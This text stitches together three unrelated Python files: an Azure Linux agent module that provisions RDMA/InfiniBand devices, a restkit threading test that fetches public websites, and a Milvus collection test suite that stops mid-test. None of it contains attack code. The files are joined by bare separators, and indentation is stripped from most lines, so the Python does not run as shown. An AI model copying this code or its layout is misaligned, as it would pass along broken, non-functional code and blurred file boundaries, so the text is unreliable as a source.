#
# Copyright 2016 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Handle packages and modules to enable RDMA for IB networking
"""
import os
import re
import time
import threading
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
import azurelinuxagent.common.utils.fileutil as fileutil
import azurelinuxagent.common.utils.shellutil as shellutil
from azurelinuxagent.common.utils.textutil import parse_doc, find, getattrib
from azurelinuxagent.common.protocol.wire import SHARED_CONF_FILE_NAME
dapl_config_paths = [
'/etc/dat.conf',
'/etc/rdma/dat.conf',
'/usr/local/etc/dat.conf'
]
def setup_rdma_device(nd_version):
logger.verbose("Parsing SharedConfig XML contents for RDMA details")
xml_doc = parse_doc(
fileutil.read_file(os.path.join(conf.get_lib_dir(), SHARED_CONF_FILE_NAME)))
if xml_doc is None:
logger.error("Could not parse SharedConfig XML document")
return
instance_elem = find(xml_doc, "Instance")
if not instance_elem:
logger.error("Could not find <Instance> in SharedConfig document")
return
rdma_ipv4_addr = getattrib(instance_elem, "rdmaIPv4Address")
if not rdma_ipv4_addr:
logger.error(
"Could not find rdmaIPv4Address attribute on Instance element of SharedConfig.xml document")
return
rdma_mac_addr = getattrib(instance_elem, "rdmaMacAddress")
if not rdma_mac_addr:
logger.error(
"Could not find rdmaMacAddress attribute on Instance element of SharedConfig.xml document")
return
# add colons to the MAC address (e.g. 00155D33FF1D ->
# 00:15:5D:33:FF:1D)
rdma_mac_addr = ':'.join([rdma_mac_addr[i:i+2]
for i in range(0, len(rdma_mac_addr), 2)])
logger.info("Found RDMA details. IPv4={0} MAC={1}".format(
rdma_ipv4_addr, rdma_mac_addr))
    # Set up the RDMA device with the collected information
RDMADeviceHandler(rdma_ipv4_addr, rdma_mac_addr, nd_version).start()
logger.info("RDMA: device is set up")
return
class RDMAHandler(object):
driver_module_name = 'hv_network_direct'
nd_version = None
def get_rdma_version(self):
"""Retrieve the firmware version information from the system.
This depends on information provided by the Linux kernel."""
if self.nd_version :
return self.nd_version
kvp_key_size = 512
kvp_value_size = 2048
driver_info_source = '/var/lib/hyperv/.kvp_pool_0'
base_kernel_err_msg = 'Kernel does not provide the necessary '
base_kernel_err_msg += 'information or the kvp daemon is not running.'
if not os.path.isfile(driver_info_source):
error_msg = 'RDMA: Source file "%s" does not exist. '
error_msg += base_kernel_err_msg
logger.error(error_msg % driver_info_source)
return
f = open(driver_info_source)
while True :
key = f.read(kvp_key_size)
value = f.read(kvp_value_size)
if key and value :
key_0 = key.split("\x00")[0]
value_0 = value.split("\x00")[0]
if key_0 == "NdDriverVersion" :
f.close()
self.nd_version = value_0
return self.nd_version
else :
break
f.close()
error_msg = 'RDMA: NdDriverVersion not found in "%s"'
logger.error(error_msg % driver_info_source)
return
@staticmethod
def is_kvp_daemon_running():
"""Look for kvp daemon names in ps -ef output and return True/False
"""
# for centos, the hypervkvpd and the hv_kvp_daemon both are ok.
# for suse, it uses hv_kvp_daemon
kvp_daemon_names = ['hypervkvpd', 'hv_kvp_daemon']
exitcode, ps_out = shellutil.run_get_output("ps -ef")
if exitcode != 0:
raise Exception('RDMA: ps -ef failed: %s' % ps_out)
for n in kvp_daemon_names:
if n in ps_out:
logger.info('RDMA: kvp daemon (%s) is running' % n)
return True
else:
logger.verbose('RDMA: kvp daemon (%s) is not running' % n)
return False
def load_driver_module(self):
"""Load the kernel driver, this depends on the proper driver
to be installed with the install_driver() method"""
logger.info("RDMA: probing module '%s'" % self.driver_module_name)
result = shellutil.run('modprobe --first-time %s' % self.driver_module_name)
if result != 0:
error_msg = 'Could not load "%s" kernel module. '
error_msg += 'Run "modprobe --first-time %s" as root for more details'
logger.error(
error_msg % (self.driver_module_name, self.driver_module_name)
)
return False
logger.info('RDMA: Loaded the kernel driver successfully.')
return True
def install_driver_if_needed(self):
if self.nd_version:
self.install_driver()
else:
logger.info('RDMA: skip installing driver when ndversion not present\n')
def install_driver(self):
"""Install the driver. This is distribution specific and must
be overwritten in the child implementation."""
logger.error('RDMAHandler.install_driver not implemented')
def is_driver_loaded(self):
"""Check if the network module is loaded in kernel space"""
cmd = 'lsmod | grep ^%s' % self.driver_module_name
status, loaded_modules = shellutil.run_get_output(cmd)
logger.info('RDMA: Checking if the module loaded.')
if loaded_modules:
logger.info('RDMA: module loaded.')
return True
logger.info('RDMA: module not loaded.')
return False
def reboot_system(self):
"""Reboot the system. This is required as the kernel module for
the rdma driver cannot be unloaded with rmmod"""
logger.info('RDMA: Rebooting system.')
ret = shellutil.run('shutdown -r now')
if ret != 0:
logger.error('RDMA: Failed to reboot the system')
dapl_config_paths = [
'/etc/dat.conf', '/etc/rdma/dat.conf', '/usr/local/etc/dat.conf']
class RDMADeviceHandler(object):
"""
Responsible for writing RDMA IP and MAC address to the /dev/hvnd_rdma
interface.
"""
rdma_dev = '/dev/hvnd_rdma'
sriov_dir = '/sys/class/infiniband'
device_check_timeout_sec = 120
device_check_interval_sec = 1
ipoib_check_timeout_sec = 60
ipoib_check_interval_sec = 1
ipv4_addr = None
mac_adr = None
nd_version = None
def __init__(self, ipv4_addr, mac_addr, nd_version):
self.ipv4_addr = ipv4_addr
self.mac_addr = mac_addr
self.nd_version = nd_version
def start(self):
"""
Start a thread in the background to process the RDMA tasks and returns.
"""
logger.info("RDMA: starting device processing in the background.")
threading.Thread(target=self.process).start()
def process(self):
try:
if not self.nd_version :
logger.info("RDMA: provisioning SRIOV RDMA device.")
self.provision_sriov_rdma()
else :
logger.info("RDMA: provisioning Network Direct RDMA device.")
self.provision_network_direct_rdma()
except Exception as e:
logger.error("RDMA: device processing failed: {0}".format(e))
def provision_network_direct_rdma(self) :
RDMADeviceHandler.update_dat_conf(dapl_config_paths, self.ipv4_addr)
skip_rdma_device = False
module_name = "hv_network_direct"
retcode,out = shellutil.run_get_output("modprobe -R %s" % module_name, chk_err=False)
if retcode == 0:
module_name = out.strip()
else:
logger.info("RDMA: failed to resolve module name. Use original name")
retcode,out = shellutil.run_get_output("modprobe %s" % module_name)
if retcode != 0:
logger.error("RDMA: failed to load module %s" % module_name)
return
retcode,out = shellutil.run_get_output("modinfo %s" % module_name)
if retcode == 0:
            version = re.search(r"version:\s+(\d+)\.(\d+)\.(\d+)\D", out, re.IGNORECASE)
if version:
v1 = int(version.groups(0)[0])
v2 = int(version.groups(0)[1])
if v1>4 or v1==4 and v2>0:
logger.info("Skip setting /dev/hvnd_rdma on 4.1 or later")
skip_rdma_device = True
else:
logger.info("RDMA: hv_network_direct driver version not present, assuming 4.0.x or older.")
else:
logger.warn("RDMA: failed to get module info on hv_network_direct.")
if not skip_rdma_device:
RDMADeviceHandler.wait_rdma_device(
self.rdma_dev, self.device_check_timeout_sec, self.device_check_interval_sec)
RDMADeviceHandler.write_rdma_config_to_device(
self.rdma_dev, self.ipv4_addr, self.mac_addr)
RDMADeviceHandler.update_network_interface(self.mac_addr, self.ipv4_addr)
def provision_sriov_rdma(self) :
RDMADeviceHandler.wait_any_rdma_device(
self.sriov_dir, self.device_check_timeout_sec, self.device_check_interval_sec)
RDMADeviceHandler.update_iboip_interface(self.ipv4_addr, self.ipoib_check_timeout_sec, self.ipoib_check_interval_sec)
return
@staticmethod
def update_iboip_interface(ipv4_addr, timeout_sec, check_interval_sec) :
logger.info("Wait for ib0 become available")
total_retries = timeout_sec/check_interval_sec
n = 0
found_ib0 = None
while not found_ib0 and n < total_retries:
ret, output = shellutil.run_get_output("ifconfig -a")
if ret != 0:
raise Exception("Failed to list network interfaces")
found_ib0 = re.search("ib0", output, re.IGNORECASE)
if found_ib0:
break
time.sleep(check_interval_sec)
n += 1
if not found_ib0:
raise Exception("ib0 is not available")
netmask = 16
logger.info("RDMA: configuring IPv4 addr and netmask on ipoib interface")
addr = '{0}/{1}'.format(ipv4_addr, netmask)
if shellutil.run("ifconfig ib0 {0}".format(addr)) != 0:
raise Exception("Could set addr to {0} on ib0".format(addr))
logger.info("RDMA: ipoib address and netmask configured on interface")
@staticmethod
def update_dat_conf(paths, ipv4_addr):
"""
Looks at paths for dat.conf file and updates the ip address for the
infiniband interface.
"""
logger.info("Updating DAPL configuration file")
for f in paths:
logger.info("RDMA: trying {0}".format(f))
if not os.path.isfile(f):
logger.info(
"RDMA: DAPL config not found at {0}".format(f))
continue
logger.info("RDMA: DAPL config is at: {0}".format(f))
cfg = fileutil.read_file(f)
new_cfg = RDMADeviceHandler.replace_dat_conf_contents(
cfg, ipv4_addr)
fileutil.write_file(f, new_cfg)
logger.info("RDMA: DAPL configuration is updated")
return
raise Exception("RDMA: DAPL configuration file not found at predefined paths")
@staticmethod
def replace_dat_conf_contents(cfg, ipv4_addr):
old = "ofa-v2-ib0 u2.0 nonthreadsafe default libdaplofa.so.2 dapl.2.0 \"\S+ 0\""
new = "ofa-v2-ib0 u2.0 nonthreadsafe default libdaplofa.so.2 dapl.2.0 \"{0} 0\"".format(
ipv4_addr)
return re.sub(old, new, cfg)
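# Illustration (hypothetical addresses): a dat.conf entry of the form
#   ofa-v2-ib0 u2.0 nonthreadsafe default libdaplofa.so.2 dapl.2.0 "10.0.0.1 0"
# has the quoted address rewritten to the supplied ipv4_addr, e.g.
#   ofa-v2-ib0 u2.0 nonthreadsafe default libdaplofa.so.2 dapl.2.0 "172.16.1.10 0"
# any text after the quoted address is left unchanged.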
@staticmethod
def write_rdma_config_to_device(path, ipv4_addr, mac_addr):
data = RDMADeviceHandler.generate_rdma_config(ipv4_addr, mac_addr)
logger.info(
"RDMA: Updating device with configuration: {0}".format(data))
with open(path, "w") as f:
logger.info("RDMA: Device opened for writing")
f.write(data)
logger.info("RDMA: Updated device with IPv4/MAC addr successfully")
@staticmethod
def generate_rdma_config(ipv4_addr, mac_addr):
return 'rdmaMacAddress="{0}" rdmaIPv4Address="{1}"'.format(mac_addr, ipv4_addr)
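# Example (hypothetical values):
#   generate_rdma_config("172.16.1.10", "00:15:5D:00:00:01")
# returns the string written to /dev/hvnd_rdma:
#   rdmaMacAddress="00:15:5D:00:00:01" rdmaIPv4Address="172.16.1.10"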
@staticmethod
def wait_rdma_device(path, timeout_sec, check_interval_sec):
logger.info("RDMA: waiting for device={0} timeout={1}s".format(path, timeout_sec))
total_retries = timeout_sec/check_interval_sec
n = 0
while n < total_retries:
if os.path.exists(path):
logger.info("RDMA: device ready")
return
logger.verbose(
"RDMA: device not ready, sleep {0}s".format(check_interval_sec))
time.sleep(check_interval_sec)
n += 1
logger.error("RDMA device wait timed out")
raise Exception("The device did not show up in {0} seconds ({1} retries)".format(
timeout_sec, total_retries))
@staticmethod
def wait_any_rdma_device(dir, timeout_sec, check_interval_sec):
logger.info(
"RDMA: waiting for any Infiniband device at directory={0} timeout={1}s".format(
dir, timeout_sec))
total_retries = timeout_sec/check_interval_sec
n = 0
while n < total_retries:
r = os.listdir(dir)
if r:
logger.info("RDMA: device found in {0}".format(dir))
return
logger.verbose(
"RDMA: device not ready, sleep {0}s".format(check_interval_sec))
time.sleep(check_interval_sec)
n += 1
logger.error("RDMA device wait timed out")
raise Exception("The device did not show up in {0} seconds ({1} retries)".format(
timeout_sec, total_retries))
@staticmethod
def update_network_interface(mac_addr, ipv4_addr):
netmask=16
logger.info("RDMA: will update the network interface with IPv4/MAC")
if_name=RDMADeviceHandler.get_interface_by_mac(mac_addr)
logger.info("RDMA: network interface found: {0}", if_name)
logger.info("RDMA: bringing network interface up")
if shellutil.run("ifconfig {0} up".format(if_name)) != 0:
raise Exception("Could not bring up RMDA interface: {0}".format(if_name))
logger.info("RDMA: configuring IPv4 addr and netmask on interface")
addr = '{0}/{1}'.format(ipv4_addr, netmask)
if shellutil.run("ifconfig {0} {1}".format(if_name, addr)) != 0:
raise Exception("Could set addr to {1} on {0}".format(if_name, addr))
logger.info("RDMA: network address and netmask configured on interface")
@staticmethod
def get_interface_by_mac(mac):
ret, output = shellutil.run_get_output("ifconfig -a")
if ret != 0:
raise Exception("Failed to list network interfaces")
output = output.replace('\n', '')
match = re.search(r"(eth\d).*(HWaddr|ether) {0}".format(mac),
output, re.IGNORECASE)
if match is None:
raise Exception("Failed to get ifname with mac: {0}".format(mac))
output = match.group(0)
eths = re.findall(r"eth\d", output)
if eths is None or len(eths) == 0:
raise Exception("ifname with mac: {0} not found".format(mac))
return eths[-1]
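# Minimal usage sketch (illustrative values only). The handler is constructed
# with the RDMA IPv4 address, MAC address and ND driver version supplied by the
# platform; start() returns immediately while process() provisions the device
# on a background thread:
#
#   handler = RDMADeviceHandler("172.16.1.10", "00:15:5D:00:00:01", "140.0")
#   handler.start()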
|
test_threads.py
|
import threading
import timeit
from restkit import *
#set_logging("debug")
urls = [
"http://yahoo.fr",
"http://google.com",
"http://friendpaste.com",
"http://benoitc.io",
"http://couchdb.apache.org"]
allurls = []
for i in range(10):
allurls.extend(urls)
def fetch(u):
r = request(u, follow_redirect=True)
print "RESULT: %s: %s (%s)" % (u, r.status, len(r.body_string()))
def spawn(u):
t = threading.Thread(target=fetch, args=[u])
t.daemon = True
t.start()
return t
def extract():
threads = [spawn(u) for u in allurls]
[t.join() for t in threads]
t = timeit.Timer(stmt=extract)
print "%.2f s" % t.timeit(number=1)
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
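# default_single_query above describes a minimal top-k vector search request:
# a single random query vector of default_dim, searched with the L2 metric,
# topk=default_top_k and nprobe=10.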
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with an empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create a collection with a duplicate name and no schema or data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
expected: two collection objects are available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with non-string field name
method: create field schema with a non-string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create schema with only a vector field (float or binary)
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_float_vec_field(name="tmp")]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
method: set is_primary=False on all fields
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
